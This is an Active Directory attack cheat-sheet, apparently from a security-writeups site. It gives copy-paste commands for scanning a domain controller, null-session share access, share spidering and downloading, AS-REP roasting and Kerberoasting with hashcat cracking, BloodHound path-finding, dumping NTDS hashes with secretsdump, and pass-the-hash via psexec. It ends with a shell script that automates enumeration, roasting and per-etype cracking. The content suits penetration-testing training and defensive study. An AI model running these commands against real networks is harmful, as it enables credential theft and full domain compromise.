# Active Directory Enumeration Cheat-Sheet

su7t3 // Security Writeups: https://hacksmarter-writeups.pages.dev/docs/ad-enumeration-cheatsheet/

A living reference for the AD enumeration loop. Copy-paste ready; swap `<DC-IP>`, `<DOMAIN>`, and creds.

## Host discovery & fingerprint

```bash
nmap -p- --min-rate 2000 -oA nmap/all <DC-IP>
nmap -p 53,88,135,139,389,445,464,636,3268 -sCV -oA nmap/svc <DC-IP>
nxc smb <DC-IP>                        # hostname + domain + OS + SMB signing status
```

## SMB

```bash
nxc smb <DC-IP> -u '' -p '' --shares                 # null session (try -u guest -p '' if it is refused)
nxc smb <DC-IP> -u USER -p PASS --shares
nxc smb <DC-IP> -u USER -p PASS --users              # domain users via SAMR
nxc smb <DC-IP> -u USER -p PASS -M spider_plus -o DOWNLOAD_FLAG=True   # list and download readable share contents
```

## LDAP

```bash
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=local" -s base    # anonymous bind; take the base DN from the nxc/nmap output
nxc ldap <DC-IP> -u USER -p PASS --asreproast asrep.hash
nxc ldap <DC-IP> -u USER -p PASS --kerberoasting kerb.hash
```

## Kerberos

```bash
# AS-REP roast (no creds needed if you have a userlist)
impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC-IP> -usersfile users.txt -no-pass -outputfile asrep.hash
# Kerberoast (creds needed)
impacket-GetUserSPNs <DOMAIN>/USER:PASS -dc-ip <DC-IP> -request -outputfile kerb.hash
# Crack (these modes are for etype 23 / RC4; lines starting $krb5tgs$17$ or $krb5tgs$18$ need -m 19600 / 19700)
hashcat -m 18200 asrep.hash rockyou.txt   # AS-REP
hashcat -m 13100 kerb.hash rockyou.txt    # TGS / Kerberoast
```

## BloodHound

```bash
bloodhound-python -u USER -p PASS -d <DOMAIN> -ns <DC-IP> -c All --zip
```

Then in the UI: mark the compromised user as owned → *Shortest Path to Domain Admins* → *DCSync Rights*.

## Post-compromise

```bash
impacket-secretsdump <DOMAIN>/USER:PASS@<DC-IP>                # needs DCSync rights or admin on the DC; dumps NTDS hashes for PtH
impacket-psexec -hashes :NTLM <DOMAIN>/administrator@<DC-IP>   # pass-the-hash (LM half left empty)
```

> [!WARNING]
> Sync your clock before any Kerberos op: `sudo ntpdate <DC-IP>`. Skew > 5 min = `KRB_AP_ERR_SKEW`.
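The loop above wired together as a small POSIX-sh driver. This is an added example, not code from the cheat-sheet or from the su7t3 / HackSmarter writeups. It assumes `DOMAIN`, `DC_IP`, `USER`, `PASS` as placeholders and writes under an assumed `loot/` directory. It covers the two caveats the page only hints at: a roasted-hash line is routed to the hashcat mode that matches its etype (18200/13100 only handle RC4; the AS-REP AES modes 32100/32200 assume hashcat 6.2.6 or newer), and the clock is checked against the DC before any Kerberos step. The helpers are pure shell and work offline; the tool calls run only when the script is executed with four arguments.

```shell
#!/bin/sh
# Added example, not part of the original cheat-sheet: a POSIX-sh driver for
# the AD enumeration loop. hashcat_mode, split_hashes, ntp_offset and skew_ok
# are pure shell and work offline; enum_loop calls nxc / bloodhound-python /
# hashcat only when the script is run with four arguments and DRY_RUN is unset.
# DOMAIN / DC_IP / USER / PASS and the loot/ paths are assumed placeholders.
set -eu

# Map a roasted-hash line to its hashcat mode. 18200 and 13100 only cover RC4
# (etype 23); an account limited to AES yields etype 17/18 lines that those
# modes reject. AS-REP AES modes 32100/32200 need hashcat >= 6.2.6 (assumption).
hashcat_mode() {                       # hashcat_mode HASHLINE -> mode on stdout
  case "$1" in
    '$krb5asrep$23$'*) echo 18200 ;;   # AS-REP, RC4-HMAC
    '$krb5asrep$17$'*) echo 32100 ;;   # AS-REP, AES128-CTS-HMAC-SHA1-96
    '$krb5asrep$18$'*) echo 32200 ;;   # AS-REP, AES256-CTS-HMAC-SHA1-96
    '$krb5tgs$23$'*)   echo 13100 ;;   # TGS-REP (Kerberoast), RC4-HMAC
    '$krb5tgs$17$'*)   echo 19600 ;;   # TGS-REP, AES128
    '$krb5tgs$18$'*)   echo 19700 ;;   # TGS-REP, AES256
    *) return 1 ;;                     # not a Kerberos hash we know
  esac
}

# Sort a mixed hash file into OUTDIR/<mode>.hash, one file per hashcat mode,
# and print the modes found (sorted, one per line). Unknown lines go to stderr.
split_hashes() {                       # split_hashes HASHFILE OUTDIR
  mkdir -p "$2"
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    if mode=$(hashcat_mode "$line"); then
      printf '%s\n' "$line" >> "$2/$mode.hash"
    else
      printf 'skipping unrecognised line: %.40s...\n' "$line" >&2
    fi
  done < "$1"
  ls "$2" | sed -n 's/\.hash$//p' | sort
}

# Extract the signed offset (seconds) from `ntpdate -q` output, e.g.
# "server 10.10.10.10, stratum 1, offset +312.521, delay 0.025" -> 312.521
ntp_offset() {                         # ntp_offset "<ntpdate -q line>"
  printf '%s\n' "$1" | awk '{
    for (i = 1; i <= NF; i++) if ($i == "offset") {
      v = $(i + 1); sub(/,$/, "", v); sub(/^\+/, "", v); print v; exit
    }
  }'
}

# Kerberos tolerates 300 s of skew by default; beyond that the KDC answers
# KRB_AP_ERR_SKEW. Succeeds when |offset| <= 300.
skew_ok() {                            # skew_ok OFFSET_SECONDS
  awk -v o="$1" 'BEGIN { o += 0; if (o < 0) o = -o; exit (o > 300) }'
}

run() {                                # run CMD... (print instead when DRY_RUN is set)
  if [ -n "${DRY_RUN:-}" ]; then printf '[dry] %s\n' "$*"; else "$@"; fi
}

enum_loop() {                          # enum_loop DOMAIN DC_IP USER PASS
  domain=$1 dc_ip=$2 ad_user=$3 ad_pass=$4
  # 1. Clock first: every Kerberos step below depends on it.
  if [ -z "${DRY_RUN:-}" ] && command -v ntpdate >/dev/null; then
    off=$(ntp_offset "$(ntpdate -q "$dc_ip" 2>/dev/null | head -n 1)")
    skew_ok "${off:-0}" || { echo "skew ${off}s > 300s; run: sudo ntpdate $dc_ip" >&2; return 1; }
  fi
  mkdir -p loot
  # 2. Enumerate (SMB, LDAP, roasting, BloodHound), as in the cheat-sheet.
  run nxc smb "$dc_ip" -u "$ad_user" -p "$ad_pass" --shares
  run nxc smb "$dc_ip" -u "$ad_user" -p "$ad_pass" --users
  run nxc ldap "$dc_ip" -u "$ad_user" -p "$ad_pass" --asreproast loot/asrep.hash
  run nxc ldap "$dc_ip" -u "$ad_user" -p "$ad_pass" --kerberoasting loot/kerb.hash
  run bloodhound-python -u "$ad_user" -p "$ad_pass" -d "$domain" -ns "$dc_ip" -c All --zip
  # 3. Crack: one hashcat run per etype instead of a blind -m 13100 over everything.
  for f in loot/asrep.hash loot/kerb.hash; do
    [ -s "$f" ] && split_hashes "$f" loot/by-mode >/dev/null
  done
  for f in loot/by-mode/*.hash; do
    [ -e "$f" ] || break               # glob did not match: nothing to crack
    mode=${f##*/}; mode=${mode%.hash}
    run hashcat -m "$mode" "$f" /usr/share/wordlists/rockyou.txt
  done
}

# Run the loop only when executed with the four arguments; sourcing the file
# just defines the helpers.
if [ $# -eq 4 ]; then enum_loop "$@"; fi
```

Dry-run it first to see the exact commands it would issue: `DRY_RUN=1 sh ad-loop.sh corp.local 10.10.10.10 jdoe 'Passw0rd!'` (hypothetical values). The split-by-mode step is the point: a `kerb.hash` that mixes `$krb5tgs$23$` and `$krb5tgs$18$` lines cracks only the RC4 half under `-m 13100`, and hashcat reports the rest as unrecognised rather than failing loudly.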